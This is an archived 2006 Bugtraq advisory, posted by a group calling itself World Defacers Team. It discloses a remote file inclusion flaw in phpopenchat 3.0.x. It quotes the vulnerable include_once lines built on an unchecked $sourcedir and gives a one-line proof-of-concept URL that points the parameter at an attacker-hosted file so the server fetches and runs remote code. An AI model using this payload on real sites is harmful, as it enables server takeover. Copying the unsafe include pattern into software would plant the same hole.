lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20060906191711.25859.qmail@securityfocus.com>
Date: 6 Sep 2006 19:17:11 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: WDT :-phpopenchat-3.0.*  ($sourcedir) Remote File Inclusion Exploit

[W]orld [D]efacers Team
--------------------Summary----------------

eVuln ID: WD23

Vendor:  phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ